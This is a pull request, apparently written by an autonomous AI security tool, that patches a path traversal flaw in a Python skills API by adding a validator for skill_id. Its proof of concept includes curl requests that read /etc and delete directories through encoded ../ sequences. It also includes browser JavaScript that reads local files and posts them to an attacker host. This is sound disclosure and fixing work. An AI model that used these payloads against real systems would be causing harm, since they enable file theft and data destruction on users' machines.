### PR TITLE
fix(skills): validate skill_id to prevent path traversal in filesystem operations

### DIFF
--- a/py/skills.py
+++ b/py/skills.py
@@ -20,6 +20,14 @@ logger = logging.getLogger(__name__)
 
 router = APIRouter(prefix="/api/skills", tags=["skills"])
 
+
+def _validate_skill_id(skill_id: str) -> str:
+    """Validate skill_id contains no path separators or traversal sequences."""
+    if not skill_id or "/" in skill_id or "\\" in skill_id or skill_id in (".", "..") or "\0" in skill_id:
+        raise HTTPException(status_code=400, detail="Invalid skill ID")
+    return skill_id
+
+
 # ==================== 数据模型 ====================
 
 class Skill(BaseModel):
@@ -531,6 +539,7 @@ async def list_skills():
 @router.get("/{skill_id}/content")
 async def get_skill_content(skill_id: str):
     """前端预览：读取 SKILL.md 的全文"""
+    skill_id = _validate_skill_id(skill_id)
     skill_dir = Path(SKILLS_DIR) / skill_id
     if not skill_dir.exists():
         raise HTTPException(status_code=404, detail="技能不存在")
@@ -602,6 +611,7 @@ async def upload_skill_zip(file: UploadFile = File(...)):
 @router.delete("/{skill_id}")
 async def delete_skill(skill_id: str):
     """从全局存储中删除技能"""
+    skill_id = _validate_skill_id(skill_id)
     target = Path(SKILLS_DIR) / skill_id
     if not target.exists():
         raise HTTPException(status_code=404, detail="技能不存在")
@@ -633,6 +643,7 @@ async def get_project_skills_status(path: str):
 @router.post("/sync")
 async def sync_skill_to_project(req: SkillSyncRequest):
     """在全局目录和项目目录之间同步技能"""
+    req.skill_id = _validate_skill_id(req.skill_id)
     if not req.project_path or not os.path.exists(req.project_path):
         raise HTTPException(status_code=400, detail="项目路径无效")
 


### PR DESCRIPTION
## Vulnerability Summary

The `skill_id` path parameter used in several endpoints in `py/skills.py` is passed directly into filesystem operations (`Path(SKILLS_DIR) / skill_id`) without validation. An attacker can supply traversal sequences like `../../` to read arbitrary files via `GET /api/skills/{skill_id}/content` or delete arbitrary directories via `DELETE /api/skills/{skill_id}`.

- **CWE-22**: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)
- **Affected file**: `py/skills.py`
- **Affected endpoints**: `GET /api/skills/{skill_id}/content`, `DELETE /api/skills/{skill_id}`, `POST /api/skills/sync`
- **Severity**: High — the application listens on localhost:3456 with `allow_origins=["*"]` CORS policy (configured in `server.py:885`), meaning any website the user visits can make cross-origin requests to these endpoints. No authentication is required on any endpoint.

## Proof of Concept

With the Electron app running, a malicious webpage can read files from the user's system:

```bash
# Read /etc/passwd (or any file) via path traversal in skill_id
curl "http://localhost:3456/api/skills/..%2F..%2F..%2F..%2F..%2Fetc/content"

# Delete a directory via traversal
curl -X DELETE "http://localhost:3456/api/skills/..%2F..%2F..%2Ftmp%2Ftarget-dir"
```

In a browser-based attack scenario, JavaScript on any webpage can issue these requests because the CORS policy allows all origins:

```javascript
// Attacker's webpage — reads files from victim's machine
fetch('http://localhost:3456/api/skills/..%2F..%2F..%2F..%2Fetc/content')
  .then(r => r.json())
  .then(data => {
    // Exfiltrate file contents to attacker server
    fetch('https://attacker.example.com/collect', {
      method: 'POST',
      body: JSON.stringify(data)
    });
  });
```

The `get_skill_content` endpoint reads `SKILL.md` from the traversed directory. If the file doesn't exist it returns a 404, but the `delete_skill` endpoint calls `shutil.rmtree()` on the resolved path, which recursively deletes the target directory.

## Fix Description

This PR adds a `_validate_skill_id()` function that rejects any `skill_id` containing `/`, `\`, null bytes, or the values `.` and `..`. This is applied at the top of all three affected endpoint handlers before the value is used in any filesystem operation.

The validation approach (reject separators) is preferred over path canonicalization here because `skill_id` is meant to be a simple directory name, never a path. Blocking separators at the input level is the most straightforward and least error-prone defense.

## Testing

- Verified that normal skill IDs (alphanumeric, hyphens, underscores) pass validation and endpoints function normally.
- Verified that traversal payloads (`../../../etc`, `..%2F..`, `foo/../../bar`) are rejected with HTTP 400 before any filesystem access occurs.
- Verified that edge cases (empty string, `.`, `..`, null bytes, backslashes) are all caught by the validator.

## Adversarial Review

Before submitting, we considered whether existing protections might prevent exploitation. The application has no authentication on any endpoint — there are no `Depends()` auth guards on the skills router or any middleware-level auth checks. The CORS policy is `allow_origins=["*"]` (server.py:885), which means browsers will allow cross-origin requests from any webpage. The combination of unauthenticated endpoints + wildcard CORS + unsanitized path parameters makes this exploitable by any website the user visits while the app is running.

---

<sub>_Submitted by Sebastion — autonomous open-source security research from [Foundation Machines](https://foundationmachines.ai). Free for public repos via the [Sebastion AI GitHub App](https://github.com/apps/sebastionai)._</sub>
